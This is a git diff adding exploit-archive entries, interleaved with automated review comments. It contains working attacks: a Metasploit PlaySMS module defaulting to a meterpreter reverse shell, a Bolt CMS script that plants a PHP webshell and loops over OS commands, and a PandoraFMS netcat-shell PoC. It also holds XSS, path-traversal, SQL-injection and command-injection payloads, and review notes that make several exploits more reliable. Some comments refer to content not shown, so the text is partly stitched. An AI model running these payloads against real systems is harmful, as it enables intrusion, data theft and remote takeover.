new file mode 100755
index 000000000..a75141519
--- /dev/null
+++ b/exploits/php/remote/48335.rb
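Review bot: The advisory never shows the modified request or the response that demonstrates the escalation; step 2 only says to swap the username inside the Basic and `Espo-Authorization` values, so a reader cannot tell whether the `auth-token`/`auth-token-secret` cookie values also had to change, or whether the server really accepted a token for a user it was not issued to. Adding the second request/response pair, with the admin response fields redacted, would make the claim verifiable and would show which header actually carries the trusted identity. The `Second type` example labels `user1:MzNm...` as `(user1:pass)`, but with `Espo-Authorization-By-Token: true` the right-hand side is presumably the issued token rather than a password, so `(user1:token)` would be the accurate label. As far as the text shows, the root cause would be that the server trusts the username half of the credential pair instead of deriving the identity from the token it issued, which is the point a fix should address.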
@@ -0,0 +1,153 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'PlaySMS index.php Unauthenticated Template Injection Code Execution', + 'Description' => %q{ + This module exploits a preauth Server-Side Template Injection vulnerability that leads to remote code execution + in PlaySMS before version 1.4.3. This issue is caused by double processing a server-side template with a custom + PHP template system called 'TPL' which is used in the PlaySMS template engine at + `src/Playsms/Tpl.php:_compile()`. The vulnerability is triggered when an attacker supplied username with a + malicious payload is submitted. This malicious payload is then stored in a TPL template which when rendered a + second time, results in code execution. + The TPL(https://github.com/antonraharja/tpl) template language is vulnerable to PHP code injection. + + This module was tested against PlaySMS 1.4 on HackTheBox's Forlic Machine. 
+ }, + 'Author' => + [ + 'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Metasploit Module + 'Lucas Rosevear' # Found and Initial PoC by NCC Group + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2020-8644'], + ['URL', 'https://www.youtube.com/watch?v=zu-bwoAtTrc'], + ['URL', 'https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/'] + ], + 'DefaultOptions' => + { + 'SSL' => false, + 'PAYLOAD' => 'php/meterpreter/reverse_tcp', + 'ENCODER' => 'php/base64' + }, + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'PlaySMS Before 1.4.3', {} ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => '2020-02-05' + ) + ) + + register_options( + [ + OptString.new('TARGETURI', [ true, 'Base playsms directory path', '/']), + ] + ) + end + + def uri + return target_uri.path + end + + def check + begin + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, 'index.php') + }) + rescue StandardError + vprint_error('Unable to access the index.php file') + return CheckCode::Unknown + end + + if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login') + return Exploit::CheckCode::Appears + end + + return CheckCode::Safe + end + + # Send Payload in Login Request + def login + res = send_request_cgi({ + 'uri' => normalize_uri(uri, 'index.php'), + 'method' => 'GET', + 'vars_get' => { + 'app' => 'main', + 'inc' => 'core_auth', + 'route' => 'login' + } + }) + + # Grabbing CSRF token from body + /name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine the CSRF token") if csrf.nil? 
+ vprint_good("X-CSRF-Token for login : #{csrf}") + + cookies = res.get_cookies + + vprint_status('Trying to send the payload in the username field...') + + # Encoded in base64 to avoid HTML TAGS which are filter by the Application which is also blocking semicolon(;), that is why we're using delete_suffix(';') + evil = "{{#{payload.encoded.delete_suffix(';')}}}" + + # Send Payload with cookies. + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(uri, 'index.php'), + 'cookie' => cookies, + 'vars_get' => Hash[{ + 'app' => 'main', + 'inc' => 'core_auth', + 'route' => 'login', + 'op' => 'login' + }.to_a.shuffle], + 'vars_post' => Hash[{ + 'X-CSRF-Token' => csrf, + 'username' => evil, + 'password' => '' + }.to_a.shuffle] + }) + + fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil? + + # Request Status Check + if res.code == 302 + print_good('Payload successfully sent') + return cookies + else + fail_with(Failure::UnexpectedReply, "#{peer} - Something went wrong") + end + end + + def exploit + cookies = login + vprint_status("Cookies here : #{cookies}") + # Execute Last Sent Username. + send_request_cgi({ + 'uri' => normalize_uri(uri, 'index.php'), + 'method' => 'GET', + 'cookie' => cookies, + 'vars_get' => { + 'app' => 'main', + 'inc' => 'core_auth', + 'route' => 'login' + } + }, 0) + end +end \ No newline at end of file diff --git a/exploits/php/webapps/47898.py b/exploits/php/webapps/47898.py index 4cd329aa0..46246b5c1 100755 --- a/exploits/php/webapps/47898.py +++ b/exploits/php/webapps/47898.py 
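Review bot: `check` dereferences `res.code` and `res.headers` without a nil guard, yet `send_request_cgi` returns nil on a timeout instead of raising, so the `rescue StandardError` above it does not cover that case and an unresponsive host produces a NoMethodError rather than `CheckCode::Unknown`; add `return CheckCode::Unknown unless res` before the `if res.code == 302` test. The first GET in `login` has the same gap: `res.body` is matched before any nil check, so `fail_with(Failure::Unreachable, "#{peer} - No response to login page request") if res.nil?` belongs ahead of the regex. The CSRF regex `[a-z0-9"]+` includes a literal `"` in its character class, so the capture can run past the closing quote into the `>`; `[a-z0-9]+` matches the hex token the comment describes. The module body continues outside this hunk, so the `exploit` method's final request, which never checks its response, is not covered here.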
@@ -12,32 +12,32 @@ import requests import sys -if len(sys.argv) !=3D 6: +if len(sys.argv) != 6: print("[+] Usage : ./exploit.py target username password ip port") exit() -target =3D sys.argv[1] -username =3D sys.argv[2] -password =3D sys.argv[3] -ip =3D sys.argv[4] -port =3D int(sys.argv[5]) +target = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] +ip = sys.argv[4] +port = int(sys.argv[5]) -request =3D requests.session() +request = requests.session() -login_info =3D { +login_info = { "nick": username, "pass": password, "login_button": "Login" } -login_request =3D request.post( - target+"/pandora_console/index.php?login=3D1", +login_request = request.post( + target+"/pandora_console/index.php?login=1", login_info, - verify=3DFalse, - allow_redirects=3DTrue + verify=False, + allow_redirects=True ) -resp =3D login_request.text +resp = login_request.text if "User not found in database" in resp: print("[-] Login Failed") @@ -47,7 +47,7 @@ else: print("[+] Sending crafted graph request ..") -body_request =3D { +body_request = { "date": "0", "time": "0", "period": "0", @@ -65,7 +65,6 @@ body_request =3D { "draw_button": "Draw" } -draw_url =3D target + "/pandora_console/index.php?sec=3Dnetf&sec2=3Doperati= -on/netflow/nf_live_view&pure=3D0" +draw_url = target + "/pandora_console/index.php?sec=netf&sec2=operati=on/netflow/nf_live_view&pure=0" print("[+] Check your netcat ;)") request.post(draw_url, body_request) \ No newline at end of file diff --git a/exploits/php/webapps/48289.txt b/exploits/php/webapps/48289.txt new file mode 100644 index 000000000..213de9367 --- /dev/null +++ b/exploits/php/webapps/48289.txt 
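Review bot: The third hunk's new `draw_url` still carries the quoted-printable soft line break: the two removed lines `operati=` / `on/netflow/nf_live_view&pure=3D0"` were an encoded wrap, and the cleanup joined them as `operati=on/netflow/nf_live_view`, so the request is now sent to `sec2=operati=on/...` and presumably never reaches the netflow view that this PoC relies on. The line should read `draw_url = target + "/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0"`. The other two hunks correctly turn `=3D` back into `=`; a final grep for a trailing `=` at a line end in the original would have caught the remaining artefact.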
@@ -0,0 +1,30 @@
+# Exploit Title: LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting
+# Date: 2020-04-02
+# Exploit Author: Matthew Aberegg, Michael Burkey
+# Vendor Homepage: https://www.limesurvey.org
+# Version: LimeSurvey 4.1.11+200316
+# Tested on: Ubuntu 18.04.4
+# CVE : CVE-2020-11456
+
+# Vulnerability Details
+Description : A stored cross-site scripting vulnerability exists within the "Survey Groups" functionality of the LimeSurvey administration panel.
+Vulnerable Parameter : "title"
+
+
+# POC
+POST /limesurvey/index.php/admin/surveysgroups/sa/create HTTP/1.1
+Host: TARGET
+Content-Length: 374
+Cache-Control: max-age=0
+Origin: http://TARGET
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://TARGET/limesurvey/index.php/admin/surveysgroups/sa/create
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: LS-ERXSBPYJOOGIGFYW=7ge1q4rvsdgs0b6usksh3j5lb0; YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D
+Connection: close
+
+YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D&SurveysGroups%5Bowner_id%5D=&SurveysGroups%5Bgsid%5D=&SurveysGroups%5Bname%5D=XSSTEST&SurveysGroups%5Btitle%5D=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&SurveysGroups%5Bdescription%5D=This+is+a+test.&SurveysGroups%5Bsortorder%5D=4&SurveysGroups%5Bparent_id%5D=&yt0=
\ No newline at end of file
diff --git a/exploits/php/webapps/48296.py b/exploits/php/webapps/48296.py
new file mode 100755
index 000000000..9b3401a53
--- /dev/null
+++ b/exploits/php/webapps/48296.py
@@ -0,0 +1,167 @@ +# Exploit Title: Bolt CMS 3.7.0 - Authenticated Remote Code Execution +# Date: 2020-04-05 +# Exploit Author: r3m0t3nu11 +# Vendor Homepage: https://bolt.cm/ +# Software Link: https://bolt.cm/ +# Version: up to date and 6.x +# Tested on: Linux +# CVE : not-yet-0day + +# last version + +# p0c + + +#!/usr/bin/python + +import requests +import sys +import warnings +import re +import os +from bs4 import BeautifulSoup +from colorama import init +from termcolor import colored + +init() + +print(colored(''' + ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄▄ + ▄▄▄▄▄▄▄▄▄▄▄ +▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌ +▐░░▌▐░░░░░░░░░░░▌ +▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌ +▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀ +▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ +▐░▌▐░▌▐░▌ +▐░█▄▄▄▄▄▄▄█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▐░▌ +▐░▌▐░█▄▄▄▄▄▄▄▄▄ +▐░░░░░░░░░░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ + ▐░▌▐░░░░░░░░░░░▌ +▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▀ ▐░▌ +▀▀▀▀▀▀▀▀▀█░▌ +▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ + ▐░ +▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░▌ +▄▄▄▄▄▄▄▄▄█░▌ +▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░▌ +▐░▌▐░░░░░░░░░░░▌ + ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ + ▀▀▀▀▀▀▀▀▀▀▀ + +Pre Auth rce with low credintanl +By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue")) + + + +if len(sys.argv) != 4: + print((len(sys.argv))) + print((colored("[~] Usage : ./bolt.py url username password","red"))) + exit() +url = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] + + + +request = requests.session() +print((colored("[+] Retrieving CSRF token to submit the login +form","green"))) +page = request.get(url+"/bolt/login") +html_content = page.text +soup = BeautifulSoup(html_content, 'html.parser') +token = soup.findAll('input')[2].get("value") + +login_info = { + "user_login[username]": username, + "user_login[password]": password, + "user_login[login]": "", + "user_login[_token]": token + } + +login_request = 
request.post(url+"/bolt/login", login_info) +print((colored("[+] Login token is : {0}","green")).format(token)) + + + +aaa = request.get(url+"/bolt/profile") +soup0 = BeautifulSoup(aaa.content, 'html.parser') +token0 = soup0.findAll('input')[6].get("value") +data_profile = { +"user_profile[password][first]":"password", +"user_profile[password][second]":"password", +"user_profile[email]":"a@a.com", +"user_profile[displayname]":"<?php system($_GET['test']);?>", +"user_profile[save]":"", +"user_profile[_token]":token0 + +} +profile = request.post(url+'/bolt/profile',data_profile) + + + + +cache_csrf = request.get(url+"/bolt/overview/showcases") + +soup1 = BeautifulSoup(cache_csrf.text, 'html.parser') +csrf = soup1.findAll('div')[12].get("data-bolt_csrf_token") + + +asyncc = request.get(url+"/async/browse/cache/.sessions?multiselect=true") +soup2 = BeautifulSoup(asyncc.text, 'html.parser') +tables = soup2.find_all('span', class_ = 'entry disabled') + + +print((colored("[+] SESSION INJECTION ","green"))) +for all_tables in tables: + +f= open("session.txt","a+") +f.write(all_tables.text+"\n") +f.close() +num_lines = sum(1 for line in open('session.txt')) + +renamePostData = { +"namespace": "root", +"parent": "/app/cache/.sessions", +"oldname": all_tables.text, +"newname": "../../../public/files/test{}.php".format(num_lines), +"token": csrf + } +rename = request.post(url+"/async/folder/rename", renamePostData) + + + + +try: +url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines) + +rev = requests.get(url1).text +r1 = re.findall('php',rev) + +r2 = r1[0] +if r2 == "php" : +fileINJ = "test{}".format(num_lines) + +print((colored("[+] FOUND : "+fileINJ,"green"))) + +except IndexError: +print((colored("[-] Not found.","red"))) + +new_name = 0 +while new_name != 'quit': +inputs = input(colored("Enter OS command , for exit 'quit' : +","green","on_red")) +if inputs == "quit" : +exit() +else: +a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs)) +aa = a.text 
+r11 = re.findall('...displayname";s:..:"([\w\s\W]+)',aa)
+
+
+print((r11)[0])
+
+
+
+
+Greetz to : all my friends
\ No newline at end of file
diff --git a/exploits/php/webapps/48297.txt b/exploits/php/webapps/48297.txt
new file mode 100644
index 000000000..bda2a8a0f
--- /dev/null
+++ b/exploits/php/webapps/48297.txt
@@ -0,0 +1,18 @@
+# Exploit Title: LimeSurvey 4.1.11 - 'File Manager' Path Traversal
+# Date: 2020-04-02
+# Exploit Author: Matthew Aberegg, Michael Burkey
+# Vendor Homepage: https://www.limesurvey.org
+# Version: LimeSurvey 4.1.11+200316
+# Tested on: Ubuntu 18.04.4
+# CVE : CVE-2020-11455
+
+# Vulnerability Details
+# Description : A path traversal vulnerability exists within the "File Manager" functionality of LimeSurvey
+# that allows an attacker to download arbitrary files. The file manager functionality will also
+# delete the file after it is downloaded (if the web service account has permissions to do so),
+# allowing an attacker to cause a denial of service by specifying a critical LimeSurvey configuration file.
+Vulnerable Parameter : "path"
+
+
+# POC
+https://TARGET/limesurvey/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd
\ No newline at end of file
diff --git a/exploits/php/webapps/48303.txt b/exploits/php/webapps/48303.txt
new file mode 100644
index 000000000..d15f6555f
--- /dev/null
+++ b/exploits/php/webapps/48303.txt
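Review bot: The `data_profile` POST in the middle of the hunk resets the victim account's password to the literal `password` and its email to `a@a.com`, so running the script changes the credentials the operator was given and most likely locks the real user out; reuse the supplied credential instead, `"user_profile[password][first]": password,` / `"user_profile[password][second]": password,`, and leave the email field alone if the form accepts the existing value. The header says `Authenticated Remote Code Execution` while the banner prints `Pre Auth rce with low credintanl`; only the former matches the code, which logs in with a username and password before anything else. As printed here the body of `for all_tables in tables:` (`f= open(...)`, `renamePostData`, the rename POST) and the `try`/`while` blocks carry no indentation, so unless the whitespace was lost in transit the file will not parse. `soup.findAll('input')[2]`, `soup0.findAll('input')[6]` and `soup1.findAll('div')[12]` select tokens by position in the markup, which breaks on any theme or version difference; selecting by `name` or the `data-bolt_csrf_token` attribute would be far more robust.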
@@ -0,0 +1,111 @@ +# Exploit Title: Django 3.0 - Cross-Site Request Forgery Token Bypass +# Date: 2020-04-08 +# Exploit Author: Spad Security Group +# Vendor Homepage: https://www.djangoproject.com/ +# Software Link: https://pypi.org/project/Django/ +# Version: 3.0 =< +# Tested on: windows 10 +# Language: python3.8 + +# t.me/SpadSec +# Spad Security Group + + +from requests import Session +import sys +from bs4 import BeautifulSoup +from time import sleep +from colorama import Fore, Style +from random import choice +from os import name, system + +colors = [Fore.RED, Fore.BLUE, Fore.WHITE, Fore.GREEN, Fore.CYAN, Fore.YELLOW] + + +def cleaner(): + if name == "nt": + system("cls") + else: + system("clear") + +def logo_printer(): + cleaner() + logo = r""" + \_______/ + `.,-'\_____/`-.,' + /`..'\ _ /`.,'\ + / /`.,' `.,'\ \ +/__/__/ \__\__\__ +\ \ \ / / / + \ \,'`._,'`./ / + \,'`./___\,'`./ + ,'`-./_____\,-'`. + / \ + """ + _logo_enumer = 0 + for char in logo: + sys.stdout.write(f"{choice(colors)}{char}{Style.RESET_ALL}") + sys.stdout.flush() + _logo_enumer +=1 + sleep(0.005) + print(f"{colors[4]}DjangoCsrfMiddlewareToken bypass by SpadSecurity Group \n{colors[3]}\tt.me/SpadSec") + +class DjangoCsrfMiddleWareBypass: + def __init__(self, url: str, username: str, password: str): + self.url = url + self.username = username + self.password = password + logo_printer() + self.cookies = {} + self.session = Session() + self.bypass() + + def spad_printer(self, string): + print("\n") + for char in string: + sys.stdout.write(char) + sys.stdout.flush() + sleep(0.05) + + def bypass(self): + global colors + _conn = self.session.get(self.url) + self.spad_printer(f"{colors[5]}[{colors[0]}x{colors[5]}] {colors[4]}Target: {colors[3]}{self.url}") + self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Trying to bypass cookies ...") + for key, value in _conn.cookies.items(): + self.cookies[key] = value + self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] 
{colors[1]}Bypassed Cookies ;)!") + + soup = BeautifulSoup(_conn.text, "lxml") + csrf = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value'] + self.spad_printer(f"{colors[5]}[{colors[0]}~{colors[5]}] {colors[1]}Csrf-Token Found{Style.RESET_ALL}") + + login = self.session.post(self.url, data={'csrfmiddlewaretoken': csrf, 'username': self.username, 'password': self.password}, cookies=self.cookies) + if len(login.history) >= 2: + if login.history[1].is_redirect: + self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in") + else: + self.spad_printer("[-] Error") + else: + if login.history: + if login.history[0].is_redirect: + self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in{Style.RESET_ALL}") + for key, value in self.session.cookies.items(): + self.spad_printer(f"{colors[5]}[{colors[0]}!{colors[5]}] {colors[4]}{key} {colors[1]}-> {colors[4]}{value}{Style.RESET_ALL}") + else: + self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error") + else: + self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error") + +if __name__ == "__main__": + try: + url = sys.argv[1] + username = sys.argv[2] + password = sys.argv[3] + DjangoCsrfMiddleWareBypass(url, username, password) + except IndexError: + logo_printer() + for char in f"[!] python {sys.argv[0]} http://google.com username password": + sys.stdout.write(char) + sys.stdout.flush() + sleep(0.05) \ No newline at end of file diff --git a/exploits/php/webapps/48312.txt b/exploits/php/webapps/48312.txt new file mode 100644 index 000000000..c4a02318e --- /dev/null +++ b/exploits/php/webapps/48312.txt 
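Review bot: `bypass` does not bypass Django's CSRF protection: it GETs the login page, reads the `csrfmiddlewaretoken` hidden field, keeps the `csrftoken` cookie the server set in the same `Session`, and posts both back, which is the double-submit check working exactly as designed. An attacker in the CSRF position, on another origin, can read neither value, so the script demonstrates an ordinary first-party login and the title `Django 3.0 - Cross-Site Request Forgery Token Bypass` and the `Csrf-Token bypassed and logged in` messages are not supported by the code; the description should state this plainly or the entry should be withdrawn. Minor: `BeautifulSoup(_conn.text, "lxml")` needs the `lxml` package, which is neither imported nor mentioned, and if the form lacks a `csrfmiddlewaretoken` input the `['value']` subscript raises `TypeError` instead of reporting that the field was not found.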
@@ -0,0 +1,26 @@
+# Exploit Title: Webtateas 2.0 - Arbitrary File Read
+# Date: 2020-04-12
+# Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd.
+# Vendor Homepage: http://webtareas.sourceforge.net/general/home.php
+# Software Link: http://webtareas.sourceforge.net/general/home.php
+# Version: Webtateas v2.0
+# Tested on: Windows
+# CVE : N/A
+
+Vulnerable Request:
+POST /webtareas/includes/general_serv.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 72
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/webtareas/general/home.php?
+Cookie: webTareasSID=k2vicb6pn9gsajncg3l6ltbver
+DNT: 1
+
+action=cardview-actions&prefix=..%2F&extpath=../../../../Windows/win.ini
\ No newline at end of file
diff --git a/exploits/php/webapps/48315.txt b/exploits/php/webapps/48315.txt
new file mode 100644
index 000000000..cd87d86a0
--- /dev/null
+++ b/exploits/php/webapps/48315.txt
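Review bot: The request carries a `webTareasSID` session cookie, so the file read is most likely reachable only by a logged-in user, and the header should say so once confirmed, e.g. `# Authentication: required (any authenticated user)`, because post-auth versus unauthenticated arbitrary file read changes the severity considerably. The product is spelled `Webtateas` in the title and version lines while the vendor URL in the same header reads `webtareas`; that typo will defeat searches by product name. Both `prefix=..%2F` and `extpath=../../../../Windows/win.ini` appear to be joined into the path, so a fix presumably has to canonicalise the combined path and verify it stays under the intended directory rather than filtering a single parameter.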
@@ -0,0 +1,28 @@
+# Exploit Title: Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion
+# Google Dork: N/A
+# Date: 2020-04-13
+# Exploit Author: Daniel Monzón (stark0de)
+# Vendor Homepage: http://davidlingren.com/
+# Software Link: https://wordpress.org/plugins/media-library-assistant/
+# Version: 2.81
+# Tested on: Windows 7 x86 SP1
+# CVE : CVE-2020-11731, CVE-2020-11732
+
+----Local File Inclusion----------------------------
+
+There is a file inclusion vulnerability in the mla-file-downloader.php file. Example:
+
+http://server/wordpress/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=C:\Bitnami\wordpress-5.3.2-2\apps\wordpress\htdocs\wp-content\plugins\updraftplus\options.php
+
+Visiting the above URL would lead to disclosure of the contents of options.php. Note that this vulnerability does not require authentication.
+
+
+----Multiple Cross-Site-Scripting-------------------
+
+There are both reflected and stored cross-site scripting vulnerabilities in almost all Settings/Media Library Assistant tabs, which allow remote authenticated users to execute arbitrary JavaScript.
+
+Note that this vulnerability requires authentication.
+
+
+
+Tested on Windows 7 Pro SP1 32-bit and Wordpress 5.3.2
\ No newline at end of file
diff --git a/exploits/php/webapps/48316.txt b/exploits/php/webapps/48316.txt
new file mode 100644
index 000000000..7d16a13e7
--- /dev/null
+++ b/exploits/php/webapps/48316.txt
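Review bot: The PoC passes an absolute Windows path in `mla_download_file` and the server returns the file's contents under the caller-chosen `mla_download_type=text/html` type, which is an arbitrary file download/read rather than a local file inclusion in which the file would be executed; unless inclusion was actually observed, the title should read `Arbitrary File Read` so defenders triage it correctly. Two CVEs are listed but the text never says which covers the file read and which the XSS; a split such as `# CVE : CVE-2020-11731 (file download), CVE-2020-11732 (XSS)`, once checked against the CVE records, would remove the ambiguity. The XSS section names no tab, parameter, request or payload, so it cannot be reproduced from this advisory; at least one concrete parameter and payload should be added or the section marked as not yet published.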
@@ -0,0 +1,34 @@
+# Exploit Title: MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection
+# Google Dork: inurl:human.aspx intext:moveit
+# Date: 2020-04-12
+# Exploit Authors: Aviv Beniash, Noam Moshe
+# Vendor Homepage: https://www.ipswitch.com/
+# Version: MOVEit Transfer 2018 SP2 before 10.2.4, 2019 before 11.0.2, and 2019.1 before 11.1.1
+# CVE : CVE-2019-16383
+#
+# Related Resources:
+# https://community.ipswitch.com/s/article/SQL-Injection-Vulnerability
+# https://nvd.nist.gov/vuln/detail/CVE-2019-16383
+
+# Description:
+# The API call for revoking logon tokens is vulnerable to a
+# Time based blind SQL injection via the 'token' parameter
+
+# MSSQL payload:
+
+POST /api/v1/token/revoke HTTP/1.1
+Host: moveittransferstg
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 32
+
+token='; WAITFOR DELAY '0:0:10'--
+
+
+# MySQL payload:
+
+POST /api/v1/token/revoke HTTP/1.1
+Host: moveittransferstg
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 21
+
+token=' OR SLEEP(10);
\ No newline at end of file
diff --git a/exploits/php/webapps/48323.txt b/exploits/php/webapps/48323.txt
new file mode 100644
index 000000000..e6038c894
--- /dev/null
+++ b/exploits/php/webapps/48323.txt
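Review bot: The MySQL payload `token=' OR SLEEP(10);` leaves a dangling `;` followed by whatever the original statement continues with (at least the closing quote), so unless stacked queries are enabled the server presumably rejects the statement with a syntax error before `SLEEP()` runs and the test yields a false negative; `token=' OR SLEEP(10)-- -` or `token=' OR SLEEP(10) AND 'a'='a` keeps the statement well-formed, mirroring the MSSQL variant, which is fine because `--` comments out the remainder. For a time-based check, record a baseline response time and repeat with a second delay value (say 5 and 15 seconds) so that network jitter is not read as injection. The advisory sits under `exploits/php/webapps` while the dork `inurl:human.aspx` points to an ASP.NET application; that is a taxonomy note only, but it affects where people look for it.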
@@ -0,0 +1,75 @@ +# Title: Pinger 1.0 - Remote Code Execution +# Date: 2020-04-13 +# Author: Milad Karimi +# Vendor Homepage: https://github.com/wcchandler/pinger +# Software Link: https://github.com/wcchandler/pinger +# Tested on: windows 10 , firefox +# Version: 1.0 +# CVE : N/A + +================================================================================ +Pinger 1.0 - Simple Pinging Webapp Remote Code Execution +================================================================================ +# Vendor Homepage: https://github.com/wcchandler/pinger +# Software Link: https://github.com/wcchandler/pinger +# Date: 2020.04.13 +# Author: Milad Karimi +# Tested on: windows 10 , firefox +# Version: 1.0 +# CVE : N/A +================================================================================ +# Description: +simple, easy to use jQuery frontend to php backend that pings various +devices and changes colors from green to red depending on if device is +up or down. + +# PoC : + +http://localhost/pinger/ping.php?ping=;echo '<?php phpinfo(); ?>' >info.php +http://localhost/pinger/ping.php?socket=;echo '<?php phpinfo(); ?>' >info.php + + +# Vulnerabile code: + + if(isset($_GET['ping'])){ + // if this is ever noticably slower, i'll pass it stuff when called + // change the good.xml to config.xml, good is what I use at $WORK + $xml = simplexml_load_file("config.xml"); + //$xml = simplexml_load_file("good.xml"); + if($_GET['ping'] == ""){ + $host = "127.0.0.1"; + }else{ + $host = $_GET['ping']; + } + $out = trim(shell_exec('ping -n -q -c 1 -w '.$xml->backend->timeout + .' '.$host.' 
| grep received | awk \'{print $4}\'')); + $id = str_replace('.','_',$host); + + if(($out == "1") || ($out == "0")){ + echo json_encode(array("id"=>"h$id","res"=>"$out")); + }else{ + ## if it returns nothing, assume network is messed up + echo json_encode(array("id"=>"h$id","res"=>"0")); + } + } + + if(isset($_GET['socket'])){ + $xml = simplexml_load_file("config.xml"); + //$xml = simplexml_load_file("good.xml"); + if($_GET['socket'] == ""){ + $host = "127.0.0.1 80"; + }else{ + $host = str_replace(':',' ',$_GET['socket']); + } + $out = shell_exec('nc -v -z -w '.$xml->backend->timeout.' '.$host.' 2>&1'); + $id = str_replace('.','_',$host); + $id = str_replace(' ','_',$id); + if(preg_match("/succeeded/",$out)){ + echo json_encode(array("id"=>"h$id","res"=>"1")); + }else{ + ## if it returns nothing, assume network is messed up + echo json_encode(array("id"=>"h$id","res"=>"0")); + } + } + + ?> \ No newline at end of file diff --git a/exploits/php/webapps/48324.txt b/exploits/php/webapps/48324.txt new file mode 100644 index 000000000..b44c3167f --- /dev/null +++ b/exploits/php/webapps/48324.txt 
